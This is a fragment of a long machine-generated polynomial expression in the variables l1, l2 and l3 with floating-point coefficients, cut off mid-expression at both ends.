2.73467498516293e+32*l1**12*l2*l3**14 + 6.70131235079011e+31*l1**12*l2*l3**13 - 1.55896847231873e+31*l1**12*l2*l3**12 - 2.44678754729186e+29*l1**12*l2*l3**11 + 3.97193897488431e+29*l1**12*l2*l3**10 - 7.84940577485815e+27*l1**12*l2*l3**9 - 5.43579518601739e+27*l1**12*l2*l3**8 + 8.26061551994606e+25*l1**12*l2*l3**7 + 3.75501060350499e+25*l1**12*l2*l3**6 - 3.18149690417014e+23*l1**12*l2*l3**5 - 1.2917196408323e+23*l1**12*l2*l3**4 + 4.44036657999888e+20*l1**12*l2*l3**3 + 1.77978225342475e+20*l1**12*l2*l3**2 - 1.40633026716987e+17*l1**12*l2*l3 - 5.12196232812315e+16*l1**12*l2 - 5.45919874500137e+32*l1**12*l3**16 - 2.49178003947566e+32*l1**12*l3**15 - 1.63854756055254e+31*l1**12*l3**14 + 5.22902618494509e+30*l1**12*l3**13 + 5.62750103062424e+29*l1**12*l3**12 - 1.23762236916409e+28*l1**12*l3**11 - 8.27440115745077e+27*l1**12*l3**10 - 1.07350229512091e+27*l1**12*l3**9 + 5.44612328823947e+25*l1**12*l3**8 + 1.07000990940081e+25*l1**12*l3**7 - 1.82006891747171e+23*l1**12*l3**6 - 4.52091297258949e+22*l1**12*l3**5 + 2.7318792364778e+20*l1**12*l3**4 + 7.81556754316308e+19*l1**12*l3**3 - 1.38610365731162e+17*l1**12*l3**2 - 3.92884342369648e+16*l1**12*l3 + 7530036559070.65*l1**12 + 5.42058269640244e+32*l1**11*l2**17 + 3.56795126365879e+33*l1**11*l2**16*l3 - 1.53723674875544e+32*l1**11*l2**16 + 1.57767103274068e+34*l1**11*l2**15*l3**2 + 4.51363456895408e+33*l1**11*l2**15*l3 + 3.01340656929508e+31*l1**11*l2**15 + 1.08311403637176e+34*l1**11*l2**14*l3**3 - 5.359680392305e+32*l1**11*l2**14*l3**2 + 7.25806720957446e+31*l1**11*l2**14*l3 + 4.92622604511646e+31*l1**11*l2**14 + 5.07533503053003e+34*l1**11*l2**13*l3**4 + 1.37512021644675e+34*l1**11*l2**13*l3**3 - 2.27934465352059e+32*l1**11*l2**13*l3**2 - 8.96101241598451e+31*l1**11*l2**13*l3 - 6.93782917909263e+29*l1**11*l2**13 + 3.81273259070052e+34*l1**11*l2**12*l3**5 + 6.31786722078706e+33*l1**11*l2**12*l3**4 + 2.16571695974337e+32*l1**11*l2**12*l3**3 + 1.21783661948892e+32*l1**11*l2**12*l3**2 - 2.83323622935213e+30*l1**11*l2**12*l3 - 1.04458928514121e+30*l1**11*l2**12 + 7.70043180374777e+34*l1**11*l2**11*l3**6 + 2.00053392758727e+34*l1**11*l2**11*l3**5 - 5.90216488445483e+32*l1**11*l2**11*l3**4 - 1.7352005313449e+32*l1**11*l2**11*l3**3 + 2.4574051262987e+29*l1**11*l2**11*l3**2 + 4.10625218258057e+29*l1**11*l2**11*l3 + 4.80019102838924e+27*l1**11*l2**11 + 7.2994154967092e+34*l1**11*l2**10*l3**7 + 1.73127421544889e+34*l1**11*l2**10*l3**6 - 6.10872086271573e+31*l1**11*l2**10*l3**5 + 3.77469275690256e+31*l1**11*l2**10*l3**4 - 6.78765807307964e+30*l1**11*l2**10*l3**3 - 2.28665446130664e+30*l1**11*l2**10*l3**2 + 3.21206564744388e+28*l1**11*l2**10*l3 + 9.537476774589e+27*l1**11*l2**10 + 8.22106397144252e+34*l1**11*l2**9*l3**8 + 2.18285165068419e+34*l1**11*l2**9*l3**7 - 6.43861529330937e+32*l1**11*l2**9*l3**6 - 1.61918441923659e+32*l1**11*l2**9*l3**5 - 8.57218952946743e+29*l1**11*l2**9*l3**4 - 2.06582455487515e+29*l1**11*l2**9*l3**3 + 2.22184393738843e+28*l1**11*l2**9*l3**2 + 4.90652359472299e+27*l1**11*l2**9*l3 - 2.14355502372086e+25*l1**11*l2**9 + 7.67535105877148e+34*l1**11*l2**8*l3**9 + 2.04642342251642e+34*l1**11*l2**8*l3**8 - 4.08169361524659e+32*l1**11*l2**8*l3**7 - 8.65692341609763e+31*l1**11*l2**8*l3**6 - 6.18602189436873e+30*l1**11*l2**8*l3**5 - 2.07582922780033e+30*l1**11*l2**8*l3**4 + 7.28293862141134e+28*l1**11*l2**8*l3**3 + 2.14759987551288e+28*l1**11*l2**8*l3**2 - 1.93142333763478e+26*l1**11*l2**8*l3 - 5.30760613878163e+25*l1**11*l2**8 + 6.65365521671513e+34*l1**11*l2**7*l3**10 + 1.78720978899768e+34*l1**11*l2**7*l3**9 - 5.54384236763541e+32*l1**11*l2**7*l3**8 - 1.23357877116619e+32*l1**11*l2**7*l3**7 - 2.84996846188098e+30*l1**11*l2**7*l3**6 - 1.12008212625168e+30*l1**11*l2**7*l3**5 + 6.24106880146733e+28*l1**11*l2**7*l3**4 + 1.86771213909204e+28*l1**11*l2**7*l3**3 - 2.25160971050599e+26*l1**11*l2**7*l3**2 - 6.10963475062795e+25*l1**11*l2**7*l3 + 5.70492547353084e+22*l1**11*l2**7 + 4.76929199250708e+34*l1**11*l2**6*l3**11 + 1.52117474407054e+34*l1**11*l2**6*l3**10 - 3.13297315377128e+32*l1**11*l2**6*l3**9 - 1.09186948478093e+32*l1**11*l2**6*l3**8 - 4.49438060106928e+30*l1**11*l2**6*l3**7 - 1.40763676247819e+30*l1**11*l2**6*l3**6 + 8.5549236669713e+28*l1**11*l2**6*l3**5 + 2.61429016053311e+28*l1**11*l2**6*l3**4 - 4.32107927435018e+26*l1**11*l2**6*l3**3 - 1.26993791695142e+26*l1**11*l2**6*l3**2 + 6.17461059624908e+23*l1**11*l2**6*l3 + 1.68280539896725e+23*l1**11*l2**6 + 4.01282732534657e+34*l1**11*l2**5*l3**12 + 8.82070507935563e+33*l1**11*l2**5*l3**11 - 4.31217378567339e+32*l1**11*l2**5*l3**10 - 5.17743551352117e+31*l1**11*l2**5*l3**9 - 1.91637356883514e+30*l1**11*l2**5*l3**8 - 1.21751209939954e+30*l1**11*l2**5*l3**7 + 7.15399430133953e+28*l1**11*l2**5*l3**6 + 2.3926028559002e+28*l1**11*l2**5*l3**5 - 4.49294960706607e+26*l1**11*l2**5*l3**4 - 1.3907412818535e+26*l1**11*l2**5*l3**3 + 8.97755609711969e+23*l1**11*l2**5*l3**2 + 2.60828985591366e+23*l1**11*l2**5*l3 - 1.09559842336007e+20*l1**11*l2**5 + 1.54880843892643e+34*l1**11*l2**4*l3**13 + 8.19809625626277e+33*l1**11*l2**4*l3**12 + 8.56798859941509e+28*l1**11*l2**4*l3**11 - 8.10607259404814e+31*l1**11*l2**4*l3**10 - 3.93546506904436e+30*l1**11*l2**4*l3**9 - 6.72940338355817e+29*l1**11*l2**4*l3**8 + 6.95860407761519e+28*l1**11*l2**4*l3**7 + 2.02948986742254e+28*l1**11*l2**4*l3**6 - 4.69764660716045e+26*l1**11*l2**4*l3**5 - 1.44990388710927e+26*l1**11*l2**4*l3**4 + 1.30469373666867e+24*l1**11*l2**4*l3**3 + 3.97702740329519e+23*l1**11*l2**4*l3**2 - 1.04921969141064e+21*l1**11*l2**4*l3 - 2.91149225193441e+20*l1**11*l2**4 + 1.58854813882185e+34*l1**11*l2**3*l3**14 + 1.5175016763891e+33*l1**11*l2**3*l3**13 - 2.56154823733414e+32*l1**11*l2**3*l3**12 + 2.03454636364827e+31*l1**11*l2**3*l3**11 + 2.24738117352253e+29*l1**11*l2**3*l3**10 - 9.3788299330296e+29*l1**11*l2**3*l3**9 + 3.66042439855247e+28*l1**11*l2**3*l3**8 + 1.60034891763539e+28*l1**11*l2**3*l3**7 - 3.45488950313478e+26*l1**11*l2**3*l3**6 - 1.19824326216273e+26*l1**11*l2**3*l3**5 + 1.2450445290154e+24*l1**11*l2**3*l3**4 + 4.03066971357547e+23*l1**11*l2**3*l3**3 - 1.52728699832047e+21*l1**11*l2**3*l3**2 - 4.61498546566703e+20*l1**11*l2**3*l3 + 1.27143158860857e+17*l1**11*l2**3 + 2.40256434758839e+33*l1**11*l2**2*l3**15 + 2.78402175220784e+33*l1**11*l2**2*l3**14 + 8.52533620780816e+31*l1**11*l2**2*l3**13 - 4.35726941546106e+31*l1**11*l2**2*l3**12 - 2.60492678600695e+30*l1**11*l2**2*l3**11 - 2.6925870943037e+28*l1**11*l2**2*l3**10 + 3.7772742646731e+28*l1**11*l2**2*l3**9 + 7.81236191525395e+27*l1**11*l2**2*l3**8 - 2.745718764564e+26*l1**11*l2**2*l3**7 - 7.63224555154382e+25*l1**11*l2**2*l3**6 + 1.0325442132754e+24*l1**11*l2**2*l3**5 + 3.16347660390928e+23*l1**11*l2**2*l3**4 - 1.68260292213884e+21*l1**11*l2**2*l3**3 - 5.19066573423719e+20*l1**11*l2**2*l3**2 + 7.70403397786904e+17*l1**11*l2**2*l3 + 1.94163900832043e+17*l1**11*l2**2 + 2.40356382178743e+33*l1**11*l2*l3**16 - 1.52428901481344e+32*l1**11*l2*l3**15 - 5.95741244396314e+31*l1**11*l2*l3**14 + 2.10939696144206e+31*l1**11*l2*l3**13 + 4.40829429772007e+29*l1**11*l2*l3**12 - 4.28406820725008e+29*l1**11*l2*l3**11 + 5.53916939320215e+27*l1**11*l2*l3**10 + 5.51164648907787e+27*l1**11*l2*l3**9 - 9.07372590886294e+25*l1**11*l2*l3**8 - 4.25651944842461e+25*l1**11*l2*l3**7 + 4.95977587123762e+23*l1**11*l2*l3**6 + 1.83473649643381e+23*l1**11*l2*l3**5 - 1.10058937807594e+21*l1**11*l2*l3**4 - 3.6586851908742e+20*l1**11*l2*l3**3 + 8.27753688217326e+17*l1**11*l2*l3**2 + 2.26307677710691e+17*l1**11*l2*l3 - 79065383870242.8*l1**11*l2 + 3.20992749072703e+32*l1**11*l3**17 + 1.96410309303258e+32*l1**11*l3**16 + 1.44183289761493e+31*l1**11*l3**15 - 5.98873455955441e+30*l1**11*l3**14 - 5.28716824560397e+29*l1**11*l3**13 + 4.80767920853915e+28*l1**11*l3**12 + 8.96974835131416e+27*l1**11*l3**11 + 7.37038105237305e+26*l1**11*l3**10 - 7.04808367818499e+25*l1**11*l3**9 - 1.07294993304813e+25*l1**11*l3**8 + 2.9814769992467e+23*l1**11*l3**7 + 5.98393178445597e+22*l1**11*l3**6 - 6.26199669836866e+20*l1**11*l3**5 - 1.42999896523037e+20*l1**11*l3**4 + 5.509163814443e+17*l1**11*l3**3 + 1.22576766566443e+17*l1**11*l3**2 - 135325221050004.0*l1**11*l3 - 18604524931709.8*l1**11 - 7.65153025702779e+31*l1**10*l2**18 - 2.58008711845471e+33*l1**10*l2**17*l3 + 3.00791760198447e+32*l1**10*l2**17 - 9.10132310906708e+33*l1**10*l2**16*l3**2 - 3.42249949974261e+33*l1**10*l2**16*l3 - 3.61844432676004e+31*l1**10*l2**16 - 3.62975713281504e+33*l1**10*l2**15*l3**3 + 2.55500586869347e+33*l1**10*l2**15*l3**2 - 3.40760895979867e+31*l1**10*l2**15*l3 - 4.22328688885701e+31*l1**10*l2**15 - 3.41904020848707e+34*l1**10*l2**14*l3**4 - 1.08098131996222e+34*l1**10*l2**14*l3**3 + 1.61737536677441e+32*l1**10*l2**14*l3**2 + 9.16081683657408e+31*l1**10*l2**14*l3 + 8.46778807510229e+29*l1**10*l2**14 - 1.58995245054999e+34*l1**10*l2**13*l3**5 + 1.85402463920441e+31*l1**10*l2**13*l3**4 - 2.48796566383925e+32*l1**10*l2**13*l3**3 - 1.48401495681038e+32*l1**10*l2**13*l3**2 + 2.07365961005989e+30*l1**10*l2**13*l3 + 9.44542622730181e+29*l1**10*l2**13 - 5.09483638746497e+34*l1**10*l2**12*l3**6 - 1.39475125263508e+34*l1**10*l2**12*l3**5 + 5.40571767049264e+32*l1**10*l2**12*l3**4 + 1.96533054138561e+32*l1**10*l2**12*l3**3 - 5.24561400416202e+29*l1**10*l2**12*l3**2 - 7.88571958939082e+29*l1**10*l2**12*l3 - 7.17036844407772e+27*l1**10*l2**12 - 4.20300000703496e+34*l1**10*l2**11*l3**7 - 8.78143028639824e+33*l1**10*l2**11*l3**6 - 1.48787988065949e+32*l1**10*l2**11*l3**5 - 1.12419016295835e+32*l1**10*l2**11*l3**4 + 6.69273717361124e+30*l1**10*l2**11*l3**3 + 2.47299305321518e+30*l1**10*l2**11*l3**2 - 2.97330053549353e+28*l1**10*l2**11*l3 - 9.44629880573793e+27*l1**10*l2**11 - 5.37476690007585e+34*l1**10*l2**10*l3**8 - 1.34063472212854e+34*l1**10*l2**10*l3**7 + 5.67302966380672e+32*l1**10*l2**10*l3**6 + 1.6427859519898e+32*l1**10*l2**10*l3**5 - 8.77703365902958e+29*l1**10*l2**10*l3**4 - 6.83241503664631e+29*l1**10*l2**10*l3**3 - 1.64752733484749e+28*l1**10*l2**10*l3**2 - 1.00295765736176e+27*l1**10*l2**10*l3 + 4.10928958577537e+25*l1**10*l2**10 - 5.05795023688627e+34*l1**10*l2**9*l3**9 - 1.32562761703008e+34*l1**10*l2**9*l3**8 + 2.23304659066776e+32*l1**10*l2**9*l3**7 + 2.30528181950754e+31*l1**10*l2**9*l3**6 + 6.67622911062507e+30*l1**10*l2**9*l3**5 + 2.27620551175224e+30*l1**10*l2**9*l3**4 - 7.53746809519211e+28*l1**10*l2**9*l3**3 - 2.19710914841676e+28*l1**10*l2**9*l3**2 + 2.20845982639188e+26*l1**10*l2**9*l3 + 5.93975832911145e+25*l1**10*l2**9 - 4.67443532881468e+34*l1**10*l2**8*l3**10 - 1.17555656604555e+34*l1**10*l2**8*l3**9 + 3.98680155886171e+32*l1**10*l2**8*l3**8 + 1.06398030287866e+32*l1**10*l2**8*l3**7 + 1.84853467374584e+30*l1**10*l2**8*l3**6 + 4.69654380006687e+29*l1**10*l2**8*l3**5 - 5.20745371408275e+28*l1**10*l2**8*l3**4 - 1.28320543163029e+28*l1**10*l2**8*l3**3 + 2.32670665975944e+26*l1**10*l2**8*l3**2 + 4.92584256459492e+25*l1**10*l2**8*l3 - 1.50473333778903e+23*l1**10*l2**8 - 3.87557225943234e+34*l1**10*l2**7*l3**11 - 1.02548551506101e+34*l1**10*l2**7*l3**10 + 3.70027299514017e+32*l1**10*l2**7*l3**9 + 6.32190507474849e+31*l1**10*l2**7*l3**8 + 3.72522324926454e+30*l1**10*l2**7*l3**7 + 1.42727805811916e+30*l1**10*l2**7*l3**6 - 8.82482211301911e+28*l1**10*l2**7*l3**5 - 2.56979751924255e+28*l1**10*l2**7*l3**4 + 5.14015581695766e+26*l1**10*l2**7*l3**3 + 1.3899620870074e+26*l1**10*l2**7*l3**2 - 8.99927668367576e+23*l1**10*l2**7*l3 - 2.21425880476561e+23*l1**10*l2**7 - 2.59365220438933e+34*l1**10*l2**6*l3**12 - 8.68593052668082e+33*l1**10*l2**6*l3**11 + 1.41794831923668e+32*l1**10*l2**6*l3**10 + 8.42803420029584e+31*l1**10*l2**6*l3**9 + 3.57413845722403e+30*l1**10*l2**6*l3**8 + 7.8472256863229e+29*l1**10*l2**6*l3**7 - 7.78142517562873e+28*l1**10*l2**6*l3**6 - 2.15372182623327e+28*l1**10*l2**6*l3**5 + 5.24301892335031e+26*l1**10*l2**6*l3**4 + 1.41319415913794e+26*l1**10*l2**6*l3**3 - 1.24997157374399e+24*l1**10*l2**6*l3**2 - 3.01104775528053e+23*l1**10*l2**6*l3 + 3.94774153166886e+20*l1**10*l2**6 - 2.39033138913419e+34*l1**10*l2**5*l3**13 - 3.74268105940225e+33*l1**10*l2**5*l3**12 + 3.57743582637434e+32*l1**10*l2**5*l3**11 + 6.38358544695794e+30*l1**10*l2**5*l3**10 + 7.63577027612233e+29*l1**10*l2**5*l3**9 + 1.08553721020016e+30*l1**10*l2**5*l3**8 - 6.69859493529663e+28*l1**10*l2**5*l3**7 - 2.2327167429171e+28*l1**10*l2**5*l3**6 + 5.86586280937862e+26*l1**10*l2**5*l3**5 + 1.70474728639023e+26*l1**10*l2**5*l3**4 - 1.97237207516336e+24*l1**10*l2**5*l3**3 - 5.31245094168354e+23*l1**10*l2**5*l3**2 + 2.09027199134532e+21*l1**10*l2**5*l3 + 4.88063796697583e+20*l1**10*l2**5 - 6.25010085095294e+33*l1**10*l2**4*l3**14 - 5.49735796322148e+33*l1**10*l2**4*l3**13 - 1.05716645887834e+32*l1**10*l2**4*l3**12 + 7.81590961918642e+31*l1**10*l2**4*l3**11 + 4.09349400072884e+30*l1**10*l2**4*l3**10 + 2.19406407879245e+29*l1**10*l2**4*l3**9 - 6.71012601347745e+28*l1**10*l2**4*l3**8 - 1.59440068958035e+28*l1**10*l2**4*l3**7 + 5.37417895558993e+26*l1**10*l2**4*l3**6 + 1.48504126525017e+26*l1**10*l2**4*l3**5 - 2.07716750009739e+24*l1**10*l2**4*l3**4 - 5.72834890927646e+23*l1**10*l2**4*l3**3 + 3.08610330319503e+21*l1**10*l2**4*l3**2 + 7.62322493639937e+20*l1**10*l2**4*l3 - 5.81042455048143e+17*l1**10*l2**4 - 9.81450347642025e+33*l1**10*l2**3*l3**15 + 3.78350958043275e+32*l1**10*l2**3*l3**14 + 2.26349951946377e+32*l1**10*l2**3*l3**13 - 4.47030403973971e+31*l1**10*l2**3*l3**12 - 1.14121549368907e+30*l1**10*l2**3*l3**11 + 9.43908729481557e+29*l1**10*l2**3*l3**10 - 2.5310400492471e+28*l1**10*l2**3*l3**9 - 1.40327941695848e+28*l1**10*l2**3*l3**8 + 3.50744010534919e+26*l1**10*l2**3*l3**7 + 1.20675180379823e+26*l1**10*l2**3*l3**6 - 1.79149633749679e+24*l1**10*l2**3*l3**5 - 5.3559928030561e+23*l1**10*l2**3*l3**4 + 3.73768574255279e+21*l1**10*l2**3*l3**3 + 1.01359701883699e+21*l1**10*l2**3*l3**2 - 2.34080091928516e+18*l1**10*l2**3*l3 - 4.89959398801245e+17*l1**10*l2**3 - 6.93746146816443e+32*l1**10*l2**2*l3**16 - 2.11728614322774e+33*l1**10*l2**2*l3**15 - 9.30191603871154e+31*l1**10*l2**2*l3**14 + 4.71852889917621e+31*l1**10*l2**2*l3**13 + 2.54509577028868e+30*l1**10*l2**2*l3**12 - 2.30503782551933e+29*l1**10*l2**2*l3**11 - 3.72041262865546e+28*l1**10*l2**2*l3**10 - 4.87084428433767e+27*l1**10*l2**2*l3**9 + 3.02855120168663e+26*l1**10*l2**2*l3**8 + 6.821735279005e+25*l1**10*l2**2*l3**7 - 1.41347764967504e+24*l1**10*l2**2*l3**6 - 3.74605284676675e+23*l1**10*l2**2*l3**5 + 3.30663886849496e+21*l1**10*l2**2*l3**4 + 8.89647083716643e+20*l1**10*l2**2*l3**3 - 2.94576635139604e+18*l1**10*l2**2*l3**2 - 6.65924712748741e+17*l1**10*l2**2*l3 + 391679878483709.0*l1**10*l2**2 - 1.32874542126762e+33*l1**10*l2*l3**17 + 3.69455637671892e+32*l1**10*l2*l3**16 + 4.57282064901339e+31*l1**10*l2*l3**15 - 2.33145888387251e+31*l1**10*l2*l3**14 - 5.4347371322419e+29*l1**10*l2*l3**13 + 4.31123549423246e+29*l1**10*l2*l3**12 - 1.85880842056685e+27*l1**10*l2*l3**11 - 5.08864228111812e+27*l1**10*l2*l3**10 + 7.43205523436781e+25*l1**10*l2*l3**9 + 4.14728042183259e+25*l1**10*l2*l3**8 - 5.76971098386353e+23*l1**10*l2*l3**7 - 2.11499929453974e+23*l1**10*l2*l3**6 + 1.84706093187854e+21*l1**10*l2*l3**5 + 5.61314885632085e+20*l1**10*l2*l3**4 - 2.35740265511075e+18*l1**10*l2*l3**3 - 5.78767514660061e+17*l1**10*l2*l3**2 + 852915135537584.0*l1**10*l2*l3 + 114983350489849.0*l1**10*l2 - 1.77462196672432e+32*l1**10*l3**18 - 1.48821708235749e+32*l1**10*l3**17 - 1.02930954935743e+31*l1**10*l3**16 + 5.94604459958824e+30*l1**10*l3**15 + 4.19076240485169e+29*l1**10*l3**14 - 7.38437124894271e+28*l1**10*l3**13 - 8.21983209893479e+27*l1**10*l3**12 - 2.74434261499295e+26*l1**10*l3**11 + 7.5767360663961e+25*l1**10*l3**10 + 8.505743157441e+24*l1**10*l3**9 - 3.91014148531005e+23*l1**10*l3**8 - 6.38189381194547e+22*l1**10*l3**7 + 1.06500790074812e+21*l1**10*l3**6 + 2.02336795224265e+20*l1**10*l3**5 - 1.35321211717792e+18*l1**10*l3**4 - 2.5652563919027e+17*l1**10*l3**3 + 616719227202752.0*l1**10*l3**2 + 89666423758957.4*l1**10*l3 - 40697398288.1142*l1**10 - 1.63025347130871e+32*l1**9*l2**19 + 1.86735096185666e+33*l1**9*l2**18*l3 - 2.992925488999e+32*l1**9*l2**18 + 4.02543786294263e+33*l1**9*l2**17*l3**2 + 2.37934827821373e+33*l1**9*l2**17*l3 + 3.37452202820942e+31*l1**9*l2**17 + 6.11456104429537e+32*l1**9*l2**16*l3**3 - 3.11196286610361e+33*l1**9*l2**16*l3**2 - 2.12041762848947e+30*l1**9*l2**16*l3 + 3.14555841736664e+31*l1**9*l2**16 + 2.00959835091656e+34*l1**9*l2**15*l3**4 + 8.08044905690771e+33*l1**9*l2**15*l3**3 - 8.25250706253553e+31*l1**9*l2**15*l3**2 - 8.09606578929614e+31*l1**9*l2**15*l3 - 8.23933008956313e+29*l1**9*l2**15 + 3.72331902311322e+33*l1**9*l2**14*l3**5 - 3.27715096434851e+33*l1**9*l2**14*l3**4 + 2.04975991687543e+32*l1**9*l2**14*l3**3 + 1.49164092368506e+32*l1**9*l2**14*l3**2 - 1.07406893341018e+30*l1**9*l2**14*l3 - 7.44791398897886e+29*l1**9*l2**14 + 2.79658433523375e+34*l1**9*l2**13*l3**6 + 9.13894220739174e+33*l1**9*l2**13*l3**5 - 4.31136964029205e+32*l1**9*l2**13*l3**4 - 2.01427445449569e+32*l1**9*l2**13*l3**3 + 4.22362341133729e+29*l1**9*l2**13*l3**2 + 9.81653357268591e+29*l1**9*l2**13*l3 + 8.0123912140802e+27*l1**9*l2**13 + 2.41275847963356e+34*l1**9*l2**12*l3**7 + 3.44481276123597e+33*l1**9*l2**12*l3**6 + 2.57554655530336e+32*l1**9*l2**12*l3**5 + 1.63306562364697e+32*l1**9*l2**12*l3**4 - 5.499225538082e+30*l1**9*l2**12*l3**3 - 2.43788702755043e+30*l1**9*l2**12*l3**2 + 2.1608362138186e+28*l1**9*l2**12*l3 + 8.1098645220677e+27*l1**9*l2**12 + 2.18790454802373e+34*l1**9*l2**11*l3**8 + 6.6395071041644e+33*l1**9*l2**11*l3**7 - 4.52793461043652e+32*l1**9*l2**11*l3**6 - 1.67097717083604e+32*l1**9*l2**11*l3**5 + 2.27956356824756e+30*l1**9*l2**11*l3**4 + 1.50823793281779e+30*l1**9*l2**11*l3**3 + 9.49689992078399e+27*l1**9*l2**11*l3**2 - 2.85538620743305e+27*l1**9*l2**11*l3 - 5.36538862247938e+25*l1**9*l2**11 + 3.86294001608347e+34*l1**9*l2**10*l3**9 + 7.62861175838067e+33*l1**9*l2**10*l3**8 - 6.79019836768346e+31*l1**9*l2**10*l3**7 + 3.25481559883066e+31*l1**9*l2**10*l3**6 - 6.51236719312184e+30*l1**9*l2**10*l3**5 - 2.43955055608735e+30*l1**9*l2**10*l3**4 + 6.61387501802429e+28*l1**9*l2**10*l3**3 + 2.07194124276906e+28*l1**9*l2**10*l3**2 - 1.99889509781405e+26*l1**9*l2**10*l3 - 5.687299495149e+25*l1**9*l2**10 + 1.61187425131541e+34*l1**9*l2**9*l3**10 + 6.25296045768907e+33*l1**9*l2**9*l3**9 - 2.60444980170023e+32*l1**9*l2**9*l3**8 - 7.94299631191171e+31*l1**9*l2**9*l3**7 + 8.98857915726429e+28*l1**9*l2**9*l3**6 + 3.26690088670211e+29*l1**9*l2**9*l3**5 + 3.00435994651791e+28*l1**9*l2**9*l3**4 + 4.17226352159017e+27*l1**9*l2**9*l3**3 - 1.88935308943064e+26*l1**9*l2**9*l3**2 - 2.52458833962446e+25*l1**9*l2**9*l3 + 2.34974968126066e+23*l1**9*l2**9 + 3.30206841139379e+34*l1**9*l2**8*l3**11 + 6.12790124853529e+33*l1**9*l2**8*l3**10 - 2.14858029593e+32*l1**9*l2**8*l3**9 - 4.36388293508253e+31*l1**9*l2**8*l3**8 - 3.96851453548408e+30*l1**9*l2**8*l3**7 - 1.27279243301646e+30*l1**9*l2**8*l3**6 + 8.03273190672382e+28*l1**9*l2**8*l3**5 + 2.26925428671792e+28*l1**9*l2**8*l3**4 - 5.03619966305391e+26*l1**9*l2**8*l3**3 - 1.32685652946645e+26*l1**9*l2**8*l3**2 + 1.0135601438162e+24*l1**9*l2**8*l3 + 2.43540227874266e+23*l1**9*l2**8 + 1.29859461626351e+34*l1**9*l2**7*l3**12 + 4.86594013798349e+33*l1**9*l2**7*l3**11 - 2.19109755296524e+32*l1**9*l2**7*l3**10 - 3.14533191853608e+31*l1**9*l2**7*l3**9 - 1.17497180193706e+30*l1**9*l2**7*l3**8 - 5.84348731008554e+29*l1**9*l2**7*l3**7 + 5.67415895688501e+28*l1**9*l2**7*l3**6 + 1.50878817973642e+28*l1**9*l2**7*l3**5 - 4.60286167980991e+26*l1**9*l2**7*l3**4 - 1.09492287811415e+26*l1**9*l2**7*l3**3 + 1.33185437247802e+24*l1**9*l2**7*l3**2 + 2.65936981771487e+23*l1**9*l2**7*l3 - 7.53583706783146e+20*l1**9*l2**7 + 1.52150512581967e+34*l1**9*l2**6*l3**13 + 4.39981035841031e+33*l1**9*l2**6*l3**12 - 2.72060747862779e+31*l1**9*l2**6*l3**11 - 6.22630185732058e+31*l1**9*l2**6*l3**10 - 3.4052484184889e+30*l1**9*l2**6*l3**9 - 4.69598071157878e+29*l1**9*l2**6*l3**8 + 7.18433748515249e+28*l1**9*l2**6*l3**7 + 1.82928350069628e+28*l1**9*l2**6*l3**6 - 6.1978586431602e+26*l1**9*l2**6*l3**5 - 1.61687036114508e+26*l1**9*l2**6*l3**4 + 2.33612157989806e+24*l1**9*l2**6*l3**3 + 5.74744441440063e+23*l1**9*l2**6*l3**2 - 3.04525513459068e+21*l1**9*l2**6*l3 - 6.55889932560576e+20*l1**9*l2**6 + 1.09570135386017e+34*l1**9*l2**5*l3**14 + 8.4830372642774e+32*l1**9*l2**5*l3**13 - 2.68873066472922e+32*l1**9*l2**5*l3**12 + 2.81583869972414e+31*l1**9*l2**5*l3**11 + 6.84180640143748e+29*l1**9*l2**5*l3**10 - 8.93087075006033e+29*l1**9*l2**5*l3**9 + 4.33635560585086e+28*l1**9*l2**5*l3**8 + 1.62163806071332e+28*l1**9*l2**5*l3**7 - 5.21107952736678e+26*l1**9*l2**5*l3**6 - 1.46925013940636e+26*l1**9*l2**5*l3**5 + 2.46229464752974e+24*l1**9*l2**5*l3**4 + 6.21328097681057e+23*l1**9*l2**5*l3**3 - 4.46658912499581e+21*l1**9*l2**5*l3**2 - 9.45298371612372e+20*l1**9*l2**5*l3 + 1.41287316905438e+18*l1**9*l2**5 + 2.12493767348476e+33*l1**9*l2**4*l3**15 + 3.62371864286257e+33*l1**9*l2**4*l3**14 + 1.45315142193695e+32*l1**9*l2**4*l3**13 - 7.68652414087374e+31*l1**9*l2**4*l3**12 - 3.89469051610746e+30*l1**9*l2**4*l3**11 + 2.27137129623771e+29*l1**9*l2**4*l3**10 + 5.77214769619085e+28*l1**9*l2**4*l3**9 + 9.79477074029616e+27*l1**9*l2**4*l3**8 - 5.14633566390933e+26*l1**9*l2**4*l3**7 - 1.25069365924498e+26*l1**9*l2**4*l3**6 + 2.5659431596221e+24*l1**9*l2**4*l3**5 + 6.55427105217793e+23*l1**9*l2**4*l3**4 - 6.06128811158765e+21*l1**9*l2**4*l3**3 - 1.44836653916876e+21*l1**9*l2**4*l3**2 + 4.78869605661596e+18*l1**9*l2**4*l3 + 9.06395602710966e+17*l1**9*l2**4 + 5.09509736128361e+33*l1**9*l2**3*l3**16 - 1.21855894345887e+33*l1**9*l2**3*l3**15 - 1.75560102654075e+32*l1**9*l2**3*l3**14 + 5.80377976622248e+31*l1**9*l2**3*l3**13 + 1.72663521408425e+30*l1**9*l2**3*l3**12 - 9.40694164846423e+29*l1**9*l2**3*l3**11 + 9.71431776212713e+27*l1**9*l2**3*l3**10 + 1.12387620816293e+28*l1**9*l2**3*l3**9 - 2.65217318080354e+26*l1**9*l2**3*l3**8 - 1.00924905728606e+26*l1**9*l2**3*l3**7 + 1.88281720767657e+24*l1**9*l2**3*l3**6 + 5.46856876436986e+23*l1**9*l2**3*l3**5 - 5.69542848462483e+21*l1**9*l2**3*l3**4 - 1.4475013438983e+21*l1**9*l2**3*l3**3 + 6.37331774042249e+18*l1**9*l2**3*l3**2 + 1.27401157716858e+18*l1**9*l2**3*l3 - 1.1824747771353e+15*l1**9*l2**3 + 1.17493744730555e+32*l1**9*l2**2*l3**17 + 1.55178364141588e+33*l1**9*l2**2*l3**16 + 7.66179279982795e+31*l1**9*l2**2*l3**15 - 4.61404487788782e+31*l1**9*l2**2*l3**14 - 2.13711255133302e+30*l1**9*l2**2*l3**13 + 4.2726002667155e+29*l1**9*l2**2*l3**12 + 3.20811891495294e+28*l1**9*l2**2*l3**11 + 1.49921565984888e+27*l1**9*l2**2*l3**10 - 2.8322943589346e+26*l1**9*l2**2*l3**9 - 4.74248513393355e+25*l1**9*l2**2*l3**8 + 1.54653565139752e+24*l1**9*l2**2*l3**7 + 3.50913702909298e+23*l1**9*l2**2*l3**6 - 4.71400958137219e+21*l1**9*l2**2*l3**5 - 1.13849170136788e+21*l1**9*l2**2*l3**4 + 6.59836164865505e+18*l1**9*l2**2*l3**3 + 1.41860619799083e+18*l1**9*l2**2*l3**2 - 2.83660529447828e+15*l1**9*l2**2*l3 - 370084626157067.0*l1**9*l2**2 + 